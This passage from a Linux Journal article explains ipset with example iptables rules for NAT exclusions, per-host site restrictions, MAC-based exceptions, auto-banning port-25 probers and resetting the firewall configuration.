If a packet came in from 1.1.1.1, it would not match the first rule (because the source address is 1.1.1.1), but it would match the second rule (because the source address is not 2.2.2.2). If a packet came in from 2.2.2.2, it would match the first rule (because the source address is not 1.1.1.1). The rules cancel each other out—all packets will match, including 1.1.1.1 and 2.2.2.2.

Although there are other ways to construct the rules properly and achieve the desired result without ipset, none are as intuitive or straightforward:

ipset -N myset iphash
ipset -A myset 1.1.1.1
ipset -A myset 2.2.2.2
iptables -A INPUT -m set ! --set myset src -g mychain

In the above, if a packet came in from 1.1.1.1, it would not match the rule (because the source address 1.1.1.1 does match the set myset). If a packet came in from 2.2.2.2, it would not match the rule (because the source address 2.2.2.2 does match the set myset). Although this is a simplistic example, it illustrates the fundamental benefit associated with fitting a complete condition in a single rule. 
In many ways, separate iptables rules are autonomous from each other, and it's not always straightforward, intuitive or optimal to get separate rules to coalesce into a single logical condition, especially when it involves mixing normal and inverted tests. ipset just makes life easier in these situations.

Another benefit of ipset is that sets can be manipulated independently of active iptables rules. Adding/changing/removing entries is a trivial matter because the information is simple and order is irrelevant. Editing a flat list doesn't require a whole lot of thought. In iptables, on the other hand, besides the fact that each rule is a significantly more complex object, the order of rules is of fundamental importance, so in-place rule modifications are much heavier and potentially error-prone operations.

[h=3]Excluding WAN, VPN and Other Routed Networks from the NAT—the Right Way[/h]
Outbound NAT (SNAT or IP masquerade) allows hosts within a private LAN to access the Internet. An appropriate iptables NAT rule matches Internet-bound packets originating from the private LAN and replaces the source address with the address of the gateway itself (making the gateway appear to be the source host and hiding the private "real" hosts behind it). NAT automatically tracks the active connections so it can forward return packets back to the correct internal host (by changing the destination from the address of the gateway back to the address of the original internal host).

Here is an example of a simple outbound NAT rule that does this, where 10.0.0.0/24 is the internal LAN:

iptables -t nat -A POSTROUTING \
    -s 10.0.0.0/24 -j MASQUERADE

This rule matches all packets coming from the internal LAN and masquerades them (that is, it applies "NAT" processing). This might be sufficient if the only route is to the Internet, where all through traffic is Internet traffic. 
If, however, there are routes to other private networks, such as with VPN or physical WAN links, you probably don't want that traffic masqueraded. One simple way (partially) to overcome this limitation is to base the NAT rule on physical interfaces instead of network numbers (this is one of the most popular NAT rules given in on-line examples and tutorials):

iptables -t nat -A POSTROUTING \
    -o eth0 -j MASQUERADE

This rule assumes that eth0 is the external interface and matches all packets that leave on it. Unlike the previous rule, packets bound for other networks that route out through different interfaces won't match this rule (like with OpenVPN links). Although many network connections may route through separate interfaces, it is not safe to assume that all will. A good example is KAME-based IPsec VPN connections (such as Openswan) that don't use virtual interfaces like other user-space VPNs (such as OpenVPN).

Another situation where the above interface match technique wouldn't work is if the outward-facing ("external") interface is connected to an intermediate network with routes to other private networks in addition to a route to the Internet. It is entirely plausible for there to be routes to private networks that are several hops away and on the same path as the route to the Internet.

Designing firewall rules that rely on matching of physical interfaces can place artificial limits and dependencies on network topology, which makes a strong case for it to be avoided if it's not actually necessary. As it turns out, this is another great application for ipset.

Let's say that besides acting as the Internet gateway for the local private LAN (10.0.0.0/24), your box routes directly to four other private networks (10.30.30.0/24, 10.40.40.0/24, 192.168.4.0/23 and 172.22.0.0/22). 
Run the following commands:

ipset -N routed_nets nethash
ipset -A routed_nets 10.30.30.0/24
ipset -A routed_nets 10.40.40.0/24
ipset -A routed_nets 192.168.4.0/23
ipset -A routed_nets 172.22.0.0/22
iptables -t nat -A POSTROUTING \
    -s 10.0.0.0/24 \
    -m set ! --set routed_nets dst \
    -j MASQUERADE

As you can see, ipset makes it easy to zero in on exactly what you want matched and what you don't. This rule would masquerade all traffic passing through the box from your internal LAN (10.0.0.0/24) except those packets bound for any of the networks in your routed_nets set, preserving normal direct IP routing to those networks. Because this configuration is based purely on network addresses, you don't have to worry about the types of connections in place (type of VPNs, number of hops and so on), nor do you have to worry about physical interfaces and topologies. This is how it should be. Because this is a pure layer-3 (network layer) implementation, the underlying classifications required to achieve it should be pure layer-3 as well.

[h=3]Limiting Certain PCs to Have Access Only to Certain Public Hosts[/h]
Let's say the boss is concerned about certain employees playing on the Internet instead of working and asks you to limit their PCs' access to a specific set of sites they need to be able to get to for their work, but he doesn't want this to affect all PCs (such as his). To limit three PCs (10.0.0.5, 10.0.0.6 and 10.0.0.7) to have outside access only to worksite1.com, worksite2.com and worksite3.com, run the following commands:

ipset -N limited_hosts iphash
ipset -A limited_hosts 10.0.0.5
ipset -A limited_hosts 10.0.0.6
ipset -A limited_hosts 10.0.0.7
ipset -N allowed_sites iphash
ipset -A allowed_sites worksite1.com
ipset -A allowed_sites worksite2.com
ipset -A allowed_sites worksite3.com
iptables -I FORWARD \
    -m set --set limited_hosts src \
    -m set ! --set allowed_sites dst \
    -j DROP

This example matches against two sets in a single rule. 
If the source matches limited_hosts and the destination does not match allowed_sites, the packet is dropped (because limited_hosts are allowed to communicate only with allowed_sites). Note that because this rule is in the FORWARD chain, it won't affect communication to and from the firewall itself, nor will it affect internal traffic (because that traffic wouldn't even involve the firewall).

[h=3]Blocking Access to Hosts for All but Certain PCs (Inverse Scenario)[/h]
Let's say the boss wants to block access to a set of sites across all hosts on the LAN except his PC and his assistant's PC. For variety, in this example, let's match the boss and assistant PCs by MAC address instead of IP. Let's say the MACs are 11:11:11:11:11:11 and 22:22:22:22:22:22, and the sites to be blocked for everyone else are badsite1.com, badsite2.com and badsite3.com.

In lieu of using a second ipset to match the MACs, let's utilize multiple iptables commands with the MARK target to mark packets for processing in subsequent rules in the same chain:

ipset -N blocked_sites iphash
ipset -A blocked_sites badsite1.com
ipset -A blocked_sites badsite2.com
ipset -A blocked_sites badsite3.com
iptables -I FORWARD -m mark --mark 0x187 -j DROP
iptables -I FORWARD \
    -m mark --mark 0x187 \
    -m mac --mac-source 11:11:11:11:11:11 \
    -j MARK --set-mark 0x0
iptables -I FORWARD \
    -m mark --mark 0x187 \
    -m mac --mac-source 22:22:22:22:22:22 \
    -j MARK --set-mark 0x0
iptables -I FORWARD \
    -m set --set blocked_sites dst \
    -j MARK --set-mark 0x187

As you can see, because you're not using ipset to do all the matching work as in the previous example, the commands are quite a bit more involved and complex. Because there are multiple iptables commands, it's necessary to recognize that their order is vitally important. Notice that these rules are being added with the -I option (insert) instead of -A (append). When a rule is inserted, it is added to the top of the chain, pushing all the existing rules down. 
Because each of these rules is being inserted, the effective order is reversed, because as each rule is added, it is inserted above the previous one. The last iptables command above actually becomes the first rule in the FORWARD chain. This rule matches all packets with a destination matching the blocked_sites ipset, and then marks those packets with 0x187 (an arbitrarily chosen hex number). The next two rules match only packets from the hosts to be excluded and that are already marked with 0x187. These two rules then set the marks on those packets to 0x0, which "clears" the 0x187 mark. Finally, the last iptables rule (which is represented by the first iptables command above) drops all packets with the 0x187 mark. This should match all packets with destinations in the blocked_sites set except those packets coming from either of the excluded MACs, because the mark on those packets is cleared before the DROP rule is reached.

This is just one way to approach the problem. Other than using a second ipset, another way would be to utilize user-defined chains. If you wanted to use a second ipset instead of the mark technique, you wouldn't be able to achieve the exact outcome as above, because ipset does not have a machash set type. There is a macipmap set type, however, but this requires matching on IP and MACs together, not on MAC alone as above.

Cautionary note: in most practical cases, this solution would not actually work for Web sites, because many of the hosts that might be candidates for the blocked_sites set (like Facebook, MySpace and so on) may have multiple IP addresses, and those IPs may change frequently. A general limitation of iptables/ipset is that hostnames should be specified only if they resolve to a single IP. Also, hostname lookups happen only at the time the command is run, so if the IP address changes, the firewall rule will not be aware of the change and still will reference the old IP. 
For this reason, a better way to accomplish these types of Web access policies is with an HTTP proxy solution, such as Squid. That topic is obviously beyond the scope of this article.

[h=3]Automatically Ban Hosts That Attempt to Access Invalid Services[/h]
ipset also provides a "target extension" to iptables that provides a mechanism for dynamically adding and removing set entries based on any iptables rule. Instead of having to add entries manually with the ipset command, you can have iptables add them for you on the fly. For example, if a remote host tries to connect to port 25, but you aren't running an SMTP server, it probably is up to no good. To deny that host the opportunity to try anything else proactively, use the following rules:

ipset -N banned_hosts iphash
iptables -A INPUT \
    -p tcp --dport 25 \
    -j SET --add-set banned_hosts src
iptables -A INPUT \
    -m set --set banned_hosts src \
    -j DROP

If a packet arrives on port 25, say with source address 1.1.1.1, it instantly is added to banned_hosts, just as if this command were run:

ipset -A banned_hosts 1.1.1.1

All traffic from 1.1.1.1 is blocked from that moment forward because of the DROP rule. Note that this also will ban hosts that try to run a port scan unless they somehow know to avoid port 25.

[h=3]Clearing the Running Config[/h]
If you want to clear the ipset and iptables config (sets, rules, entries) and reset to a fresh open firewall state (useful at the top of a firewall script), run the following commands:

iptables -P INPUT ACCEPT
iptables -P OUTPUT ACCEPT
iptables -P FORWARD ACCEPT
iptables -t filter -F
iptables -t raw -F
iptables -t nat -F
iptables -t mangle -F
ipset -F
ipset -X

Sets that are "in use", which means referenced by one or more iptables rules, cannot be destroyed (with ipset -X). So, in order to ensure a complete "reset" from any state, the iptables chains have to be flushed first (as illustrated above). 
[h=3]Conclusion[/h]
ipset adds many useful features and capabilities to the already very powerful netfilter/iptables suite. As described in this article, ipset not only provides new firewall configuration possibilities, but it also simplifies many setups that are difficult, awkward or less efficient to construct with iptables alone.

Any time you want to apply firewall rules to groups of hosts or addresses at once, you should be using ipset. As I showed in a few examples, you also can combine ipset with some of the more exotic iptables features, such as packet marking, to accomplish all sorts of designs and network policies. The next time you're working on your firewall setup, consider adding ipset to the mix. I think you will be surprised at just how useful and flexible it can be.

[h=3]Resources[/h]
Netfilter/iptables Project Home Page: http://www.netfilter.org
ipset Home Page: http://ipset.netfilter.org

Source: Advanced Firewall Configurations with ipset | Linux Journal